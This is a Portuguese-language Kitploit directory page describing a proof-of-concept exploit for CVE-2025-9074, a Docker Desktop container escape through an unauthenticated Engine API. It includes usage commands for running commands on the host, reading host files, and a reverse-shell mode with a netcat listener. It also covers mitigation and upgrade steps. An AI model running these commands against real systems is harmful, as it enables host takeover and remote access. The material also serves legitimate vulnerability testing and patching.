Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-9074-Docker-Desktop-Container-Escape — Exploit de prova de conceito para CVE-2025-9074 - Escape de contêiner da API do Docker Engine não autenticado afetando Docker Desktop < 4.44.3 no Windows e macOS (CVSS 9.3) | Kitploit
Ferramentas/GitHubGitHub/ptechamanja/cve-2025-9074-docker-desktop-container-escape
Segurança de ContêineresAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoSegurança na NuvemRed TeamingEscape de Contêiner
GitHubptechamanja/cve-2025-9074-docker-desktop-container-escape

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-9074-Docker-Desktop-Container-Escape

Exploit de prova de conceito para CVE-2025-9074 - Escape de contêiner da API do Docker Engine não autenticado afetando Docker Desktop < 4.44.3 no Windows e macOS (CVSS 9.3)

Ver Repositório
2há 8 mesesAinda não revisado

CVE-2025-9074: Prova de Conceito de Fuga de Container do Docker Desktop

CVE CVSS Platform

Exploit de Prova de Conceito para CVE-2025-9074 - uma vulnerabilidade crítica de fuga de container no Docker Desktop que permite acesso não autenticado à API do Docker Engine.

Visão Geral da Vulnerabilidade

PropriedadeValor
CVE IDCVE-2025-9074
Pontuação CVSS9.3 (Crítica)
Software AfetadoDocker Desktop < 4.44.3
Plataformas AfetadasWindows, macOS (Linux NÃO afetado)
Versão CorrigidaDocker Desktop 4.44.3+
DescobridoresFelix Boulet, Philippe Dugré
Data da DescobertaMeados de 2025
Data do Patch20 de Agosto de 2025

Detalhes Técnicos

A vulnerabilidade permite que containers em execução no Docker Desktop acessem a API do Docker Engine em http://192.168.65.7:2375 sem autenticação. Isso ocorre independentemente de:

  • Configurações de Isolamento Aprimorado de Containers (ECI)
  • Configuração "Expor daemon em tcp://localhost:2375 sem TLS"
  • Quaisquer outras configurações de segurança

Impacto

  • Windows (backend WSL): Assunção total do host com privilégios administrativos
  • macOS: Manipulação de containers e possível backdoor (limitado por prompts do usuário)
  • Linux: Não vulnerável (usa socket Unix em vez de TCP)

Causa Raiz

A API do Docker Engine foi exposta em um socket TCP acessível de dentro dos containers, permitindo:

  • Criar/excluir containers
  • Montar sistemas de arquivos do host
  • Executar comandos privilegiados
  • Desvio completo do isolamento de containers

Uso

image

Pré-requisitos

root@kitploit:~
pip3 install requests

Modo de Execução de Comandos

root@kitploit:~
# Execute a command on the host
python3 exploit.py -u http://192.168.65.7:2375 -m cmd -c "whoami"

# Read files from Windows host
python3 exploit.py -u http://192.168.65.7:2375 -m cmd -c "cat /hostfs/mnt/c/Users/Administrator/Desktop/root.txt"

# List users on Windows
python3 exploit.py -u http://192.168.65.7:2375 -m cmd -c "ls -la /hostfs/mnt/c/Users"

Modo de Shell Reverso

root@kitploit:~
# Terminal 1: Set up listener
nc -lvnp 4444

# Terminal 2: Execute exploit
python3 exploit.py -u http://192.168.65.7:2375 -m reverse -l <YOUR_IP> -p 4444

# Once connected, host filesystem is at: /hostfs

De Dentro de um Container

root@kitploit:~
# If you already have access to a container
curl http://192.168.65.7:2375/version

Cenário de Ataque

root@kitploit:~
graph TD
    A[Malicious Container] -->|No Auth Required| B[Docker Engine API<br/>192.168.65.7:2375]
    B -->|Create Container| C[Privileged Container]
    C -->|Mount Host FS| D[Full Host Access]
    D -->|Read/Write| E[Compromise System]

Mitigação

Ação Imediata Necessária

Atualize para Docker Desktop 4.44.3 ou superior imediatamente.

root@kitploit:~
# Check your Docker Desktop version
docker --version

# Update Docker Desktop
# Windows: Download from https://desktop.docker.com/win/main/amd64/Docker%20Desktop%20Installer.exe
# macOS: Download from https://desktop.docker.com/mac/main/amd64/Docker.dmg

Soluções Alternativas (Temporárias)

Se a atualização imediata não for possível:

  1. Evite executar containers não confiáveis
  2. Monitore conexões de rede a partir de containers
  3. Implemente segmentação de rede
  4. Revise todas as imagens de container antes da implantação

Referências

  • Aviso de Segurança do Docker
  • NVD CVE-2025-9074
  • Blog do Felix Boulet
  • Análise de Philippe Dugré
  • Aviso do GitHub

Aviso Legal

Esta ferramenta é fornecida apenas para fins educacionais e de teste de segurança autorizados.

  • Use apenas contra sistemas de sua propriedade ou para os quais você tenha permissão explícita para testar
  • O acesso não autorizado a sistemas de computador é ilegal
  • Os autores não assumem responsabilidade pelo uso indevido deste software

Créditos

  • Descoberta da Vulnerabilidade: Felix Boulet, Philippe Dugré
  • Desenvolvimento do PoC: Amanja Francisco
  • Equipe de Segurança do Docker: Pela resposta rápida e correção

Licença

Licença MIT - Consulte o arquivo LICENSE para detalhes

Baixar ferramenta